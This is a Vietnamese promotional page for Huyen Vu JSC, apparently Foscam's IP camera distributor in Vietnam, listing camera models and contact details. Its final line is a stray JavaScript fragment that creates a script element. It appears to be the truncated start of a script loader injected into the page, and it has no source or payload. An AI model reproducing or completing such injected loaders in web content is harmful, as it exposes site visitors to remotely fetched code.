Công ty cổ phần Huyền Vũ được hãng camera ip Foscam ủy quyền làm nhà phân phối camera ip Foscam tại Việt Nam vào năm 2009.

Ngày nay trên thị trường có rất nhiều mẫu camera, việc lựa chọn cho mình một hãng camera để lắp đặt cho đúng với nhu cầu, mục đích của mình và đặc biệt là sản phẩm phải đạt chất lương, giá thành vô cùng hợp lý. Đây chính là điều mà Quý khách hàng đang rất bâng khuâng.

Hiểu được những bâng khuâng đó của quý khách hàng. Công ty chúng tôi với nhiều năm kinh nghiệm trong lĩnh vực camera, đội ngũ nhân viên kỹ thuật chuyên nghiệp. Và với mục tiêu mong muốn mang tới cho quý khách hàng sản phẩm camera uy tín chất lương và giá vô cùng hợp với túi tiền của quý khách hàng.

Sản phẩm camera ip Foscam có tính ổn đinh cao và đạt tiêu chuẩn Châu Âu. Được xuất khẩu sang các nước như: Mỹ, Anh, Singapo, Đức, Tây Ban Nha, Thái Lan,…Và công ty cổ phần Huyền Vũ của chúng tôi là nhà phân phối camera ip Foscam tại Việt Nam.nhaphanphoicamerafoscam 00 Nhà phân phối camera ip Foscam tại Việt Nam

Công ty chúng tôi có rất nhiều mẫu camera ip phù hợp với nhu cầu của quý khách hàng và con mang tới cho quý khách hàng những trãi nghiệm công nghệ mới trong từng mẫu camera ip.

Những mẫu camera ip trong nhà như: FI9821W (HD), FI8910W, FI8918W, FI8909W,…với kiểu dáng hiện đai, cho hình ảnh rõ nét, với công nghệ kết nối chuẩn wifi tạo sự tiện dụng, gọn gàng và đơn giản trong việc lắp đặt. Điểu khiển xoay trực tiếp trên trình điều khiền giúp cho việc quan sát rộng hơn.

Những mẫu camera ip dùng cho lắp ngoài trời như: FI8904W, FI8905W, F9804W (HD),… với thiết kế chuyên nghiệp, vỏ bằng hợp kim nhôm chống rĩ, tạo sự chắc chắn khi lắp đặt, cho hình ảnh sáng đẹp, và sử dụng công nghệ kết nối không dây (wifi). Tích hợp nhiều đền hồng ngoại cho hình ảnh sáng đẹp khi quan sát vào ban đêm.nhaphanphoicamerafoscam 01 Nhà phân phối camera ip Foscam tại Việt Nam

Ngoài ra, cty chúng tôi còn có dịch vụ cloud server (xem chi tiết) với giá vô cùng hấp dẫn, nhằm mang đến cho khách hàng sự tiện dụng khi sử dụng sản phẩm của công ty chúng tôi

Và đặc biệt là quý khách hàng sẽ được hưởng những chế độ ưu đãi vô cùng tiết kiệm khi mua những sản phẩm camera ip tại công ty chúng tôi

Quý khách hàng có thể liên hệ thông tin bên dưới để được bộ phận kỹ thuật của công ty chúng tôi tư vấn và giúp cho quý khách lựa chọn những mẫu camera ip phù hợp nhất.

Thông tin:

4A Nguyễn Văn Cừ P. Cầu Kho Q.1 TP.HCM
Phone: 0983.122.162 – 08. 22101 327
Giờ làm việc: Thứ 2 – Thứ 7: 8h30 – 17h30
Email: support@huyenvu.vn

var d=document;var s=d.createElement(‘script’);